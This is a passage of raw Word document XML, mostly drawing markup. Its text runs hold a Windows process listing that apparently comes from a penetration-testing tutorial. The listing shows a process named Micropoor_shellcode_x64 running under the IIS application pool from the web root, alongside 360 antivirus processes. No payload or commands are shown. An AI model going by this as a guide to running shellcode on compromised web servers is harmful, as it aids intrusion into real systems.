517,15242e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:761.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,15230" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:15230;width:8990;height:370" coordorigin="1490,15230" coordsize="8990,370" path="m1510,15242l1510,15242,1510,15242,1510,15242,1510,15242,1510,15242,1510,15242,1511,15242,1512,15242,1512,15242,1514,15242,1515,15242,1517,15242,1519,15242,1521,15242,1524,15242,1528,15242,1532,15242,1536,15242,1541,15242,1546,15242,1552,15242,1559,15242,1566,15242,1575,15242,1583,15242,1593,15242,1603,15242,1615,15242,1627,15242,1640,15242,1654,15242,1668,15242,1684,15242,1701,15242,1719,15242,1738,15242,1758,15242,1780,15242,1802,15242,1826,15242,1851,15242,1877,15242,1904,15242,1933,15242,1963,15242,1995,15242,2028,15242,2063,15242,2099,15242,2136,15242,2175,15242,2216,15242,2259,15242,2303,15242,2348,15242,2396,15242,2445,15242,2496,15242,2549,15242,2604,15242,2660,15242,2719,15242,2779,15242,2841,15242,2906,15242,2972,15242,3041,15242,3112,15242,3184,15242,3259,15242,3336,15242,3416,15242,3498,15242,3582,15242,3668,15242,3757,15242,3848,15242,3941,15242,4037,15242,4136,15242,4236,15242,4340,15242,4446,15242,4555,15242,4666,15242,4780,15242,4897,15242,5017,15242,5139,15242,5264,15242,5392,15242,5523,15242,5657,15242,5793,15242,5933,15242,6076,15242,6222,15242,6370,15242,6522,15242,6677,15242,6835,15242,6997,15242,7161,15242,7329,15242,7500,15242,7675,15242,7853,15242,8034,15242,8219,15242,8407,15242,8598,15242,8793,15242,8992,15242,9194,15242,9400,15242,9609,15242,9823,15242,10039,15242,10260,15242,10484,15242,10484,15242,10484,15242,10484,15242,10484,15242,10484,15242,10484,15242,10484,15242,10484,15242,10484,15242,10484,15242,10484,15242,10484,15242,10484,15242,10484,15242,10484,15242,10484,15242,10484,15243,10484,15243,10484,15243,10484,15243,10484,15243,10484,15244,10484,15244,10484,15244,10484,15245,10484,15245,10484,15246,10484,15246,10484,15247,10484,15247,10484,15248,10484,15248,10484,15249,10484,15250,10484,15250,10484,15251,10484,15252,10484,15253,10484,15254,10484,15255,10484,15256,10484,15257,10484,15258,10484,15259,10484,15261,10484,15262,10484,15263,10484,15265,10484,15266,10484,15268,10484,15270,10484,15271,10484,15273,10484,15275,10484,15277,10484,15279,10484,15281,10484,15283,10484,15285,10484,15287,10484,15290,10484,15292,10484,15295,10484,15297,10484,15300,10484,15303,10484,15306,10484,15309,10484,15312,10484,15315,10484,15318,10484,15321,10484,15325,10484,15328,10484,15332,10484,15336,10484,15339,10484,15343,10484,15347,10484,15351,10484,15356,10484,15360,10484,15364,10484,15369,10484,15374,10484,15378,10484,15383,10484,15388,10484,15393,10484,15399,10484,15404,10484,15409,10484,15415,10484,15421,10484,15427,10484,15433,10484,15439,10484,15445,10484,15451,10484,15458,10484,15464,10484,15471,10484,15478,10484,15485,10484,15492,10484,15499,10484,15507,10484,15514,10484,15522,10484,15530,10484,15538,10484,15546,10484,15554,10484,15563,10484,15572,10484,15580,10484,15589,10484,15598,10484,15607,10484,15617,10484,15617,10484,15617,10484,15617,10484,15617,10484,15617,10484,15617,10483,15617,10482,15617,10482,15617,10480,15617,10479,15617,10477,15617,10475,15617,10473,15617,10470,15617,10466,15617,10462,15617,10458,15617,10453,15617,10448,15617,10442,15617,10435,15617,10428,15617,10419,15617,10411,15617,10401,15617,10391,15617,10379,15617,10367,15617,10354,15617,10340,15617,10326,15617,10310,15617,10293,15617,10275,15617,10256,15617,10236,15617,10215,15617,10192,15617,10168,15617,10143,15617,10117,15617,10090,15617,10061,15617,10031,15617,9999,15617,9966,15617,9931,15617,9895,15617,9858,15617,9819,15617,9778,15617,9735,15617,9691,15617,9646,15617,9598,15617,9549,15617,9498,15617,9445,15617,9391,15617,9334,15617,9275,15617,9215,15617,9153,15617,9088,15617,9022,15617,8953,15617,8883,15617,8810,15617,8735,15617,8658,15617,8578,15617,8497,15617,8413,15617,8326,15617,8238,15617,8146,15617,8053,15617,7957,15617,7859,15617,7758,15617,7654,15617,7548,15617,7439,15617,7328,15617,7214,15617,7097,15617,6977,15617,6855,15617,6730,15617,6602,15617,6471,15617,6337,15617,6201,15617,6061,15617,5918,15617,5773,15617,5624,15617,5472,15617,5317,15617,5159,15617,4997,15617,4833,15617,4665,15617,4494,15617,4319,15617,4141,15617,3960,15617,3776,15617,3587,15617,3396,15617,3201,15617,3002,15617,2800,15617,2594,15617,2385,15617,2172,15617,1955,15617,1734,15617,1510,15617,1510,15617,1510,15617,1510,15617,1510,15617,1510,15617,1510,15617,1510,15617,1510,15617,1510,15617,1510,15617,1510,15617,1510,15617,1510,15616,1510,15616,1510,15616,1510,15616,1510,15616,1510,15616,1510,15616,1510,15615,1510,15615,1510,15615,1510,15615,1510,15614,1510,15614,1510,15613,1510,15613,1510,15612,1510,15612,1510,15611,1510,15611,1510,15610,1510,15610,1510,15609,1510,15608,1510,15607,1510,15606,1510,15606,1510,15605,1510,15604,1510,15603,1510,15602,1510,15600,1510,15599,1510,15598,1510,15597,1510,15595,1510,15594,1510,15592,1510,15591,1510,15589,1510,15587,1510,15586,1510,15584,1510,15582,1510,15580,1510,15578,1510,15576,1510,15573,1510,15571,1510,15569,1510,15566,1510,15564,1510,15561,1510,15559,1510,15556,1510,15553,1510,15550,1510,15547,1510,15544,1510,15541,1510,15537,1510,15534,1510,15530,1510,15527,1510,15523,1510,15519,1510,15515,1510,15511,1510,15507,1510,15503,1510,15499,1510,15494,1510,15490,1510,15485,1510,15480,1510,15475,1510,15470,1510,15465,1510,15460,1510,15455,1510,15449,1510,15444,1510,15438,1510,15432,1510,15426,1510,15420,1510,15414,1510,15407,1510,15401,1510,15394,1510,15387,1510,15381,1510,15374,1510,15366,1510,15359,1510,15352,1510,15344,1510,15336,1510,15329,1510,15321,1510,15312,1510,15304,1510,15296,1510,15287,1510,15278,1510,15269,1510,15260,1510,15251,1510,15242e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:761.500pt;width:1.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,15230" coordsize="30,390">
        <v:shape style="position:absolute;left:1490;top:15230;width:30;height:390" coordorigin="1490,15230" coordsize="30,390" path="m1517,15242l1517,15242,1517,15242,1517,15242,1517,15242,1517,15242,1517,15242,1517,15242,1517,15242,1517,15242,1517,15242,1517,15242,1517,15242,1517,15242,1517,15242,1517,15242,1517,15242,1517,15243,1517,15243,1517,15243,1517,15243,1517,15243,1517,15244,1517,15244,1517,15244,1517,15245,1517,15245,1517,15246,1517,15246,1517,15247,1517,15247,1517,15248,1517,15248,1517,15249,1517,15250,1517,15250,1517,15251,1517,15252,1517,15253,1517,15254,1517,15255,1517,15256,1517,15257,1517,15258,1517,15259,1517,15261,1517,15262,1517,15263,1517,15265,1517,15266,1517,15268,1517,15270,1517,15271,1517,15273,1517,15275,1517,15277,1517,15279,1517,15281,1517,15283,1517,15285,1517,15287,1517,15290,1517,15292,1517,15295,1517,15297,1517,15300,1517,15303,1517,15306,1517,15309,1517,15312,1517,15315,1517,15318,1517,15321,1517,15325,1517,15328,1517,15332,1517,15336,1517,15339,1517,15343,1517,15347,1517,15351,1517,15356,1517,15360,1517,15364,1517,15369,1517,15374,1517,15378,1517,15383,1517,15388,1517,15393,1517,15399,1517,15404,1517,15409,1517,15415,1517,15421,1517,15427,1517,15433,1517,15439,1517,15445,1517,15451,1517,15458,1517,15464,1517,15471,1517,15478,1517,15485,1517,15492,1517,15499,1517,15507,1517,15514,1517,15522,1517,15530,1517,15538,1517,15546,1517,15554,1517,15563,1517,15572,1517,15580,1517,15589,1517,15598,1517,15607,1517,15617e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb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332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364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356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csrss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372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316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wininit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408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356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winlogon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372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services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476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372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lsass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484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372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lsm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548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spoolsv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576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22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584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mscorsvw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632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vmacthlp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24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676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764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800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848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864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2684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SoftMgrLite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900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940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1052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1076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33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1144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1216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VGAuthService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1300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vmtoolsd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36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1332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ManagementAgentHost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="22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37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1368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1440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576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WmiPrvSE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39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1476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sppsvc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40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1712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2636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360rp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1768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576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WmiPrvSE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1848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dllhost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1940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msdtc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44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2456</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="3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ZhuDongFangYu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2612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2636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1096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360sd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47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2684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1096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360Tray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5"/>
        </w:rPr>
        <w:t>  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2788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3408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Micropoor_shellcode_x64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="1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IIS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APPPOOL\DefaultAppPoo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l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\inetpub\wwwroot\Micropoor_shellcode_x64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="1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49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2868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900</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="2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dwm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50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2896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2852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explorer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51</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="22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3008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2896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vmtoolsd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235.343pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,4706">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:4706" coordorigin="10402,0" coordsize="0,4706" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,2,10402,2,10402,3,10402,4,10402,6,10402,7,10402,9,10402,11,10402,13,10402,16,10402,19,10402,22,10402,25,10402,29,10402,33,10402,38,10402,43,10402,49,10402,54,10402,61,10402,68,10402,75,10402,83,10402,91,10402,100,10402,109,10402,119,10402,130,10402,141,10402,153,10402,165,10402,178,10402,192,10402,206,10402,222,10402,237,10402,254,10402,271,10402,289,10402,308,10402,328,10402,349,10402,370,10402,392,10402,415,10402,439,10402,464,10402,490,10402,517,10402,544,10402,573,10402,603,10402,633,10402,665,10402,698,10402,732,10402,767,10402,803,10402,840,10402,878,10402,917,10402,958,10402,999,10402,1042,10402,1086,10402,1131,10402,1178,10402,1226,10402,1275,10402,1325,10402,1377,10402,1430,10402,1484,10402,1540,10402,1597,10402,1655,10402,1715,10402,1776,10402,1839,10402,1903,10402,1969,10402,2036,10402,2104,10402,2174,10402,2246,10402,2319,10402,2394,10402,2471,10402,2549,10402,2628,10402,2710,10402,2793,10402,2877,10402,2964,10402,3052,10402,3141,10402,3233,10402,3326,10402,3421,10402,3518,10402,3617,10402,3717,10402,3819,10402,3924,10402,4030,10402,4138,10402,4248,10402,4359,10402,4473,10402,4589,10402,4706e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:48.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,970" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:970;width:8990;height:390" coordorigin="1490,970" coordsize="8990,390" path="m1510,999l1510,999,1510,999,1510,999,1510,999,1510,999,1510,999,1511,999,1512,999,1512,999,1514,999,1515,999,1517,999,1519,999,1521,999,1524,999,1528,999,1532,999,1536,999,1541,999,1546,999,1552,999,1559,999,1566,999,1575,999,1583,999,1593,999,1603,999,1615,999,1627,999,1640,999,1654,999,1668,999,1684,999,1701,999,1719,999,1738,999,1758,999,1780,999,1802,999,1826,999,1851,999,1877,999,1904,999,1933,999,1963,999,1995,999,2028,999,2063,999,2099,999,2136,999,2175,999,2216,999,2259,999,2303,999,2348,999,2396,999,2445,999,2496,999,2549,999,2604,999,2660,999,2719,999,2779,999,2841,999,2906,999,2972,999,3041,999,3112,999,3184,999,3259,999,3336,999,3416,999,3498,999,3582,999,3668,999,3757,999,3848,999,3941,999,4037,999,4136,999,4236,999,4340,999,4446,999,4555,999,4666,999,4780,999,4897,999,5017,999,5139,999,5264,999,5392,999,5523,999,5657,999,5793,999,5933,999,6076,999,6222,999,6370,999,6522,999,6677,999,6835,999,6997,999,7161,999,7329,999,7500,999,7675,999,7853,999,8034,999,8219,999,8407,999,8598,999,8793,999,8992,999,9194,999,9400,999,9609,999,9823,999,10039,999,10260,999,10484,999,10484,999,10484,999,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1001,10484,1001,10484,1001,10484,1001,10484,1002,10484,1002,10484,1002,10484,1003,10484,1003,10484,1003,10484,1004,10484,1004,10484,1005,10484,1006,10484,1006,10484,1007,10484,1007,10484,1008,10484,1009,10484,1010,10484,1011,10484,1012,10484,1013,10484,1014,10484,1015,10484,1016,10484,1017,10484,1018,10484,1020,10484,1021,10484,1023,10484,1024,10484,1026,10484,1027,10484,1029,10484,1031,10484,1033,10484,1035,10484,1037,10484,1039,10484,1041,10484,1043,10484,1045,10484,1048,10484,1050,10484,1053,10484,1055,10484,1058,10484,1061,10484,1064,10484,1066,10484,1070,10484,1073,10484,1076,10484,1079,10484,1083,10484,1086,10484,1090,10484,1093,10484,1097,10484,1101,10484,1105,10484,1109,10484,1113,10484,1118,10484,1122,10484,1127,10484,1131,10484,1136,10484,1141,10484,1146,10484,1151,10484,1156,10484,1162,10484,1167,10484,1173,10484,1179,10484,1184,10484,1190,10484,1196,10484,1203,10484,1209,10484,1216,10484,1222,10484,1229,10484,1236,10484,1243,10484,1250,10484,1257,10484,1265,10484,1272,10484,1280,10484,1288,10484,1296,10484,1304,10484,1312,10484,1321,10484,1329,10484,1338,10484,1347,10484,1356,10484,1365,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10483,1375,10482,1375,10482,1375,10480,1375,10479,1375,10477,1375,10475,1375,10473,1375,10470,1375,10466,1375,10462,1375,10458,1375,10453,1375,10448,1375,10442,1375,10435,1375,10428,1375,10419,1375,10411,1375,10401,1375,10391,1375,10379,1375,10367,1375,10354,1375,10340,1375,10326,1375,10310,1375,10293,1375,10275,1375,10256,1375,10236,1375,10215,1375,10192,1375,10168,1375,10143,1375,10117,1375,10090,1375,10061,1375,10031,1375,9999,1375,9966,1375,9931,1375,9895,1375,9858,1375,9819,1375,9778,1375,9735,1375,9691,1375,9646,1375,9598,1375,9549,1375,9498,1375,9445,1375,9391,1375,9334,1375,9275,1375,9215,1375,9153,1375,9088,1375,9022,1375,8953,1375,8883,1375,8810,1375,8735,1375,8658,1375,8578,1375,8497,1375,8413,1375,8326,1375,8238,1375,8146,1375,8053,1375,7957,1375,7859,1375,7758,1375,7654,1375,7548,1375,7439,1375,7328,1375,7214,1375,7097,1375,6977,1375,6855,1375,6730,1375,6602,1375,6471,1375,6337,1375,6201,1375,6061,1375,5918,1375,5773,1375,5624,1375,5472,1375,5317,1375,5159,1375,4997,1375,4833,1375,4665,1375,4494,1375,4319,1375,4141,1375,3960,1375,3776,1375,3587,1375,3396,1375,3201,1375,3002,1375,2800,1375,2594,1375,2385,1375,2172,1375,1955,1375,1734,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1374,1510,1374,1510,1374,1510,1374,1510,1374,1510,1374,1510,1374,1510,1374,1510,1373,1510,1373,1510,1373,1510,1373,1510,1372,1510,1372,1510,1372,1510,1371,1510,1371,1510,1370,1510,1370,1510,1369,1510,1369,1510,1368,1510,1367,1510,1367,1510,1366,1510,1365,1510,1364,1510,1363,1510,1362,1510,1361,1510,1360,1510,1359,1510,1358,1510,1357,1510,1356,1510,1354,1510,1353,1510,1352,1510,1350,1510,1348,1510,1347,1510,1345,1510,1343,1510,1342,1510,1340,1510,1338,1510,1336,1510,1333,1510,1331,1510,1329,1510,1327,1510,1324,1510,1322,1510,1319,1510,1316,1510,1314,1510,1311,1510,1308,1510,1305,1510,1302,1510,1298,1510,1295,1510,1292,1510,1288,1510,1284,1510,1281,1510,1277,1510,1273,1510,1269,1510,1265,1510,1261,1510,1256,1510,1252,1510,1247,1510,1243,1510,1238,1510,1233,1510,1228,1510,1223,1510,1218,1510,1212,1510,1207,1510,1201,1510,1196,1510,1190,1510,1184,1510,1178,1510,1171,1510,1165,1510,1159,1510,1152,1510,1145,1510,1138,1510,1131,1510,1124,1510,1117,1510,1110,1510,1102,1510,1094,1510,1086,1510,1078,1510,1070,1510,1062,1510,1053,1510,1045,1510,1036,1510,1027,1510,1018,1510,1009,1510,999e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:49.500pt;width:1.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,990" coordsize="30,390">
        <v:shape style="position:absolute;left:1490;top:990;width:30;height:390" coordorigin="1490,990" coordsize="30,390" path="m1517,999l1517,999,1517,999,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1001,1517,1001,1517,1001,1517,1001,1517,1002,1517,1002,1517,1002,1517,1003,1517,1003,1517,1003,1517,1004,1517,1004,1517,1005,1517,1006,1517,1006,1517,1007,1517,1007,1517,1008,1517,1009,1517,1010,1517,1011,1517,1012,1517,1013,1517,1014,1517,1015,1517,1016,1517,1017,1517,1018,1517,1020,1517,1021,1517,1023,1517,1024,1517,1026,1517,1027,1517,1029,1517,1031,1517,1033,1517,1035,1517,1037,1517,1039,1517,1041,1517,1043,1517,1045,1517,1048,1517,1050,1517,1053,1517,1055,1517,1058,1517,1061,1517,1064,1517,1066,1517,1070,1517,1073,1517,1076,1517,1079,1517,1083,1517,1086,1517,1090,1517,1093,1517,1097,1517,1101,1517,1105,1517,1109,1517,1113,1517,1118,1517,1122,1517,1127,1517,1131,1517,1136,1517,1141,1517,1146,1517,1151,1517,1156,1517,1162,1517,1167,1517,1173,1517,1179,1517,1184,1517,1190,1517,1196,1517,1203,1517,1209,1517,1216,1517,1222,1517,1229,1517,1236,1517,1243,1517,1250,1517,1257,1517,1265,1517,1272,1517,1280,1517,1288,1517,1296,1517,1304,1517,1312,1517,1321,1517,1329,1517,1338,1517,1347,1517,1356,1517,1365,1517,1375e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:67.500pt;width:449.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1350" coordsize="8990,650">
        <v:shape style="position:absolute;left:1490;top:1350;width:8990;height:650" coordorigin="1490,1350" coordsize="8990,650" path="m1510,1375l1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1510,1375,1511,1375,1512,1375,1512,1375,1514,1375,1515,1375,1517,1375,1519,1375,1521,1375,1524,1375,1528,1375,1532,1375,1536,1375,1541,1375,1546,1375,1552,1375,1559,1375,1566,1375,1575,1375,1583,1375,1593,1375,1603,1375,1615,1375,1627,1375,1640,1375,1654,1375,1668,1375,1684,1375,1701,1375,1719,1375,1738,1375,1758,1375,1780,1375,1802,1375,1826,1375,1851,1375,1877,1375,1904,1375,1933,1375,1963,1375,1995,1375,2028,1375,2063,1375,2099,1375,2136,1375,2175,1375,2216,1375,2259,1375,2303,1375,2348,1375,2396,1375,2445,1375,2496,1375,2549,1375,2604,1375,2660,1375,2719,1375,2779,1375,2841,1375,2906,1375,2972,1375,3041,1375,3112,1375,3184,1375,3259,1375,3336,1375,3416,1375,3498,1375,3582,1375,3668,1375,3757,1375,3848,1375,3941,1375,4037,1375,4136,1375,4236,1375,4340,1375,4446,1375,4555,1375,4666,1375,4780,1375,4897,1375,5017,1375,5139,1375,5264,1375,5392,1375,5523,1375,5657,1375,5793,1375,5933,1375,6076,1375,6222,1375,6370,1375,6522,1375,6677,1375,6835,1375,6997,1375,7161,1375,7329,1375,7500,1375,7675,1375,7853,1375,8034,1375,8219,1375,8407,1375,8598,1375,8793,1375,8992,1375,9194,1375,9400,1375,9609,1375,9823,1375,10039,1375,10260,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1375,10484,1376,10484,1376,10484,1376,10484,1376,10484,1377,10484,1377,10484,1377,10484,1378,10484,1378,10484,1379,10484,1379,10484,1380,10484,1381,10484,1381,10484,1382,10484,1383,10484,1384,10484,1385,10484,1386,10484,1387,10484,1388,10484,1389,10484,1391,10484,1392,10484,1394,10484,1395,10484,1397,10484,1399,10484,1400,10484,1402,10484,1404,10484,1407,10484,1409,10484,1411,10484,1414,10484,1416,10484,1419,10484,1421,10484,1424,10484,1427,10484,1430,10484,1434,10484,1437,10484,1440,10484,1444,10484,1448,10484,1452,10484,1455,10484,1460,10484,1464,10484,1468,10484,1473,10484,1477,10484,1482,10484,1487,10484,1492,10484,1498,10484,1503,10484,1509,10484,1514,10484,1520,10484,1526,10484,1532,10484,1539,10484,1545,10484,1552,10484,1559,10484,1566,10484,1573,10484,1581,10484,1589,10484,1596,10484,1604,10484,1613,10484,1621,10484,1630,10484,1638,10484,1647,10484,1657,10484,1666,10484,1676,10484,1685,10484,1695,10484,1706,10484,1716,10484,1727,10484,1738,10484,1749,10484,1760,10484,1772,10484,1783,10484,1795,10484,1808,10484,1820,10484,1833,10484,1846,10484,1859,10484,1873,10484,1886,10484,1900,10484,1914,10484,1929,10484,1944,10484,1959,10484,1974,10484,1989,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10483,2005,10482,2005,10482,2005,10480,2005,10479,2005,10477,2005,10475,2005,10473,2005,10470,2005,10466,2005,10462,2005,10458,2005,10453,2005,10448,2005,10442,2005,10435,2005,10428,2005,10419,2005,10411,2005,10401,2005,10391,2005,10379,2005,10367,2005,10354,2005,10340,2005,10326,2005,10310,2005,10293,2005,10275,2005,10256,2005,10236,2005,10215,2005,10192,2005,10168,2005,10143,2005,10117,2005,10090,2005,10061,2005,10031,2005,9999,2005,9966,2005,9931,2005,9895,2005,9858,2005,9819,2005,9778,2005,9735,2005,9691,2005,9646,2005,9598,2005,9549,2005,9498,2005,9445,2005,9391,2005,9334,2005,9275,2005,9215,2005,9153,2005,9088,2005,9022,2005,8953,2005,8883,2005,8810,2005,8735,2005,8658,2005,8578,2005,8497,2005,8413,2005,8326,2005,8238,2005,8146,2005,8053,2005,7957,2005,7859,2005,7758,2005,7654,2005,7548,2005,7439,2005,7328,2005,7214,2005,7097,2005,6977,2005,6855,2005,6730,2005,6602,2005,6471,2005,6337,2005,6201,2005,6061,2005,5918,2005,5773,2005,5624,2005,5472,2005,5317,2005,5159,2005,4997,2005,4833,2005,4665,2005,4494,2005,4319,2005,4141,2005,3960,2005,3776,2005,3587,2005,3396,2005,3201,2005,3002,2005,2800,2005,2594,2005,2385,2005,2172,2005,1955,2005,1734,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2004,1510,2004,1510,2004,1510,2004,1510,2003,1510,2003,1510,2003,1510,2002,1510,2002,1510,2002,1510,2001,1510,2000,1510,2000,1510,1999,1510,1998,1510,1998,1510,1997,1510,1996,1510,1995,1510,1994,1510,1993,1510,1992,1510,1990,1510,1989,1510,1988,1510,1986,1510,1984,1510,1983,1510,1981,1510,1979,1510,1977,1510,1975,1510,1973,1510,1971,1510,1969,1510,1966,1510,1964,1510,1961,1510,1958,1510,1955,1510,1952,1510,1949,1510,1946,1510,1943,1510,1939,1510,1936,1510,1932,1510,1928,1510,1924,1510,1920,1510,1916,1510,1911,1510,1907,1510,1902,1510,1897,1510,1893,1510,1887,1510,1882,1510,1877,1510,1871,1510,1865,1510,1859,1510,1853,1510,1847,1510,1841,1510,1834,1510,1828,1510,1821,1510,1813,1510,1806,1510,1799,1510,1791,1510,1783,1510,1775,1510,1767,1510,1759,1510,1750,1510,1741,1510,1732,1510,1723,1510,1714,1510,1704,1510,1694,1510,1684,1510,1674,1510,1664,1510,1653,1510,1642,1510,1631,1510,1620,1510,1608,1510,1596,1510,1584,1510,1572,1510,1560,1510,1547,1510,1534,1510,1521,1510,1507,1510,1493,1510,1480,1510,1465,1510,1451,1510,1436,1510,1421,1510,1406,1510,1390,1510,1375e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:68.500pt;width:1.500pt;height:31.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1370" coordsize="30,630">
        <v:shape style="position:absolute;left:1490;top:1370;width:30;height:630" coordorigin="1490,1370" coordsize="30,630" path="m1517,1375l1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1376,1517,1376,1517,1376,1517,1376,1517,1377,1517,1377,1517,1377,1517,1378,1517,1378,1517,1379,1517,1379,1517,1380,1517,1381,1517,1381,1517,1382,1517,1383,1517,1384,1517,1385,1517,1386,1517,1387,1517,1388,1517,1389,1517,1391,1517,1392,1517,1394,1517,1395,1517,1397,1517,1399,1517,1400,1517,1402,1517,1404,1517,1407,1517,1409,1517,1411,1517,1414,1517,1416,1517,1419,1517,1421,1517,1424,1517,1427,1517,1430,1517,1434,1517,1437,1517,1440,1517,1444,1517,1448,1517,1452,1517,1455,1517,1460,1517,1464,1517,1468,1517,1473,1517,1477,1517,1482,1517,1487,1517,1492,1517,1498,1517,1503,1517,1509,1517,1514,1517,1520,1517,1526,1517,1532,1517,1539,1517,1545,1517,1552,1517,1559,1517,1566,1517,1573,1517,1581,1517,1589,1517,1596,1517,1604,1517,1613,1517,1621,1517,1630,1517,1638,1517,1647,1517,1657,1517,1666,1517,1676,1517,1685,1517,1695,1517,1706,1517,1716,1517,1727,1517,1738,1517,1749,1517,1760,1517,1772,1517,1783,1517,1795,1517,1808,1517,1820,1517,1833,1517,1846,1517,1859,1517,1873,1517,1886,1517,1900,1517,1914,1517,1929,1517,1944,1517,1959,1517,1974,1517,1989,1517,2005e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:99.500pt;width:449.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1990" coordsize="8990,650">
        <v:shape style="position:absolute;left:1490;top:1990;width:8990;height:650" coordorigin="1490,1990" coordsize="8990,650" path="m1510,2005l1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1511,2005,1512,2005,1512,2005,1514,2005,1515,2005,1517,2005,1519,2005,1521,2005,1524,2005,1528,2005,1532,2005,1536,2005,1541,2005,1546,2005,1552,2005,1559,2005,1566,2005,1575,2005,1583,2005,1593,2005,1603,2005,1615,2005,1627,2005,1640,2005,1654,2005,1668,2005,1684,2005,1701,2005,1719,2005,1738,2005,1758,2005,1780,2005,1802,2005,1826,2005,1851,2005,1877,2005,1904,2005,1933,2005,1963,2005,1995,2005,2028,2005,2063,2005,2099,2005,2136,2005,2175,2005,2216,2005,2259,2005,2303,2005,2348,2005,2396,2005,2445,2005,2496,2005,2549,2005,2604,2005,2660,2005,2719,2005,2779,2005,2841,2005,2906,2005,2972,2005,3041,2005,3112,2005,3184,2005,3259,2005,3336,2005,3416,2005,3498,2005,3582,2005,3668,2005,3757,2005,3848,2005,3941,2005,4037,2005,4136,2005,4236,2005,4340,2005,4446,2005,4555,2005,4666,2005,4780,2005,4897,2005,5017,2005,5139,2005,5264,2005,5392,2005,5523,2005,5657,2005,5793,2005,5933,2005,6076,2005,6222,2005,6370,2005,6522,2005,6677,2005,6835,2005,6997,2005,7161,2005,7329,2005,7500,2005,7675,